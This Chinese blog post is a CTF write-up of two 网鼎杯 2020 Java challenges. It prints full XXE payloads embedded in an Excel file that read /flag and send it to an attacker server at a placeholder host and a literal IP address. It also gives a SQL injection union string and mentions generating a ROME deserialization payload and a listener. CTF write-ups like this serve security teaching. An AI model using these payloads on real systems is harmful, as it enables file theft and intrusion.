网鼎杯java题

网鼎杯 2020 filejava

https://www.4armed.co/blog/exploiting-xxe-with-excel/

https://xz.aliyun.com/t/7747

下载文件处有filename目录穿越,结合报错可知道源码位置从而dump下源码开始审计

在这里插入图片描述

在这里插入图片描述

看到这里就很明显了,判断后缀名应该是xlsx,开头限制了为excel-,考的就是excel进行xxe攻击

最开始使用得是这种打法

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://vps:2122/1.dtd">
%remote;
%all;
]>
<root>&send;</root>

1.dtd为

1
<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps:2122/%file;'>">

感觉都行的,但是怎么打也打不通,后来换了一下,

在这里插入图片描述

file.dtd中为

1
2
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://39.107.239.30:3333?p=%file;'>">

在这里插入图片描述

在这里插入图片描述

网鼎杯ThinkJava

拼接导致注入漏洞

在这里插入图片描述

myapp#' union select pwd from user#这里还需要保证前面的数据库连接正确

在这里插入图片描述

登录后发现提示,这里用burp分析发现是rome漏洞,直接一把梭

在这里插入图片描述

生成payload

在这里插入图片描述

监听即可

在这里插入图片描述


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!